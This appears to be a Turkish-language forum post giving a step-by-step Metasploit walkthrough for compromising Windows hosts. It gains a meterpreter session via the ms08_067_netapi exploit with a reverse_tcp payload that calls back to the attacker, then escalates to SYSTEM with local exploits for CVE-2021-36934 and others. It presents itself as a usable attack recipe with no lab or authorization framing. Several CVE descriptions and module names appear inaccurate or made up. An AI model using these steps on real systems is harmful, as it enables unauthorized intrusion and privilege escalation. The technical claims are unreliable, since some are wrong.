Hoşgeldin Misafir

Windows Yerel Güvenlik Zafiyeti Hak Yükseltme

Mustafa73

20 Eyl 2023
423 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Windows sistemlerde kısıtlı haklardan system haklarına geçiş yapmak için çeşitli güvenlik zaafiyetleri kullanılabilir. Bunlardan bazıları şunlardır:
- CVE-2021-36934: Bu zaafiyet, Windows 10 ve Windows 11 sistemlerde, sistem dosyalarına erişim sağlayan bir sembolik bağlantı oluşturulmasına izin verir. Bu sayede, SAM, SECURITY, SYSTEM gibi hassas dosyaları okuyabilir veya değiştirebilirsiniz. Bu zaafiyeti istismar etmek için, Metasploit Framework içindeki exploit/windows/local/cve_2021_36934_hive_nightmare modülünü kullanabilirsiniz. Bu modül, hedef sistemde bir meterpreter oturumu elde ettikten sonra, sistem dosyalarını kopyalayarak, sistem parolalarını çıkarmak için Mimikatz kullanır.
- CVE-2020-1337: Bu zaafiyet, Windows Print Spooler servisindeki bir yükselme yetkisi açığıdır. Bu servis, SYSTEM yetkileri ile çalışır ve yazıcı sürücülerini yüklemek için kullanılır. Bu zaafiyeti istismar etmek için, Metasploit Framework içindeki exploit/windows/local/cve_2020_1337_printerdemon modülünü kullanabilirsiniz. Bu modül, hedef sistemde bir meterpreter oturumu elde ettikten sonra, bir DLL dosyasını yazıcı sürücüsü olarak yükler ve bu DLL dosyası çalıştığında, SYSTEM yetkilerine sahip bir meterpreter oturumu açar.
- CVE-2019-1322: Bu zaafiyet, Windows Error Reporting (WER) servisindeki bir yükselme yetkisi açığıdır. Bu servis, SYSTEM yetkileri ile çalışır ve program hatalarını raporlamak için kullanılır. Bu zaafiyeti istismar etmek için, Metasploit Framework içindeki exploit/windows/local/cve_2019_1322_wertrigger modülünü kullanabilirsiniz. Bu modül, hedef sistemde bir meterpreter oturumu elde ettikten sonra, WER servisinin çalıştığı dizine bir DLL dosyası kopyalar ve bu DLL dosyası çalıştığında, SYSTEM yetkilerine sahip bir meterpreter oturumu açar.
Bu zaafiyetlerin her biri için, aşağıdaki adımları takip edebilirsiniz:

1. Adım: Hedef sisteme bir meterpreter oturumu açmak için, uygun bir exploit modülü seçin ve gerekli seçenekleri ayarlayın. Örneğin, ms08-067 zaafiyeti için, exploit/windows/smb/ms08_067_netapi modülünü kullanabilirsiniz. Bu modül, Windows XP ve Windows 2003 sistemlerde, SMB protokolündeki bir uzaktan kod çalıştırma zaafiyetini kullanır. Bu modülü kullanmak için, hedef sistemin IP adresini ve işletim sistemini belirtmeniz gerekir. Aşağıdaki komutları kullanarak, bu modülü seçebilir ve seçeneklerini görebilirsiniz:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

2. Adım: Seçtiğiniz exploit modülüne uygun bir payload seçin ve gerekli seçenekleri ayarlayın. Payload, hedef sisteme gönderilen ve çalıştırılan kod parçasıdır. Payload seçenekleri, exploit modülüne bağlı olarak değişir. Genellikle, windows/meterpreter/reverse_tcp payloadını kullanabilirsiniz. Bu payload, hedef sistemde bir meterpreter oturumu açar ve bu oturumu, sizin belirttiğiniz IP adresi ve port numarası üzerinden geri bağlar. Bu payloadı kullanmak için, sizin IP adresinizi ve port numaranızı belirtmeniz gerekir. Aşağıdaki komutları kullanarak, bu payloadı seçebilir ve seçeneklerini görebilirsiniz:
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

3. Adım: Exploit modülünü çalıştırın ve hedef sisteme bir meterpreter oturumu açın. Aşağıdaki komutu kullanarak, exploit modülünü çalıştırabilirsiniz:
msf exploit(ms08_067_netapi) > exploit
Eğer exploit başarılı olursa, hedef sistemde bir meterpreter oturumu açılacaktır. Bu oturumun ID numarasını görebilirsiniz. Örneğin, meterpreter > yazısının yanında [1] yazıyorsa, bu oturumun ID numarası 1'dir.

4. Adım: Hedef sistemdeki güvenlik zaafiyetini istismar etmek için, uygun bir local exploit modülü seçin ve gerekli seçenekleri ayarlayın. Local exploit modülleri, zaten erişim sağlanmış bir sistemde, yükselme yetkisi veya diğer işlemler yapmak için kullanılır. Local exploit modüllerini, exploit/windows/local klasörü altında bulabilirsiniz. Örneğin, CVE-2021-36934 zaafiyeti için, exploit/windows/local/cve_2021_36934_hive_nightmare modülünü kullanabilirsiniz. Bu modülü kullanmak için, daha önce elde ettiğiniz meterpreter oturumunun ID numarasını belirtmeniz gerekir. Aşağıdaki komutları kullanarak, bu modülü seçebilir ve seçeneklerini görebilirsiniz:
msf > use exploit/windows/local/cve_2021_36934_hive_nightmare
msf exploit(cve_2021_36934_hive_nightmare) > show options

5. Adım: Local exploit modülünü çalıştırın ve hedef sistemde SYSTEM yetkilerine sahip bir meterpreter oturumu açın. Aşağıdaki komutu kullanarak, local exploit modülünü çalıştırabilirsiniz:
msf exploit(cve_2021_36934_hive_nightmare) > exploit
Eğer exploit başarılı olursa, hedef sistemde SYSTEM yetkilerine sahip bir meterpreter oturumu açılacaktır. Bu oturumun ID numarasını görebilirsiniz. Örneğin, meterpreter > yazısının yanında [2] yazıyorsa, bu oturumun ID numarası 2'dir.

6. Adım: Açtığınız meterpreter oturumlarını yönetin ve hedef sistemde istediğiniz işlemleri yapın. Meterpreter oturumları arasında geçiş yapmak için, sessions komutunu kullanabilirsiniz. Örneğin, 2 numaralı oturuma geçmek için, aşağıdaki komutu kullanabilirsiniz:
msf > sessions -i 2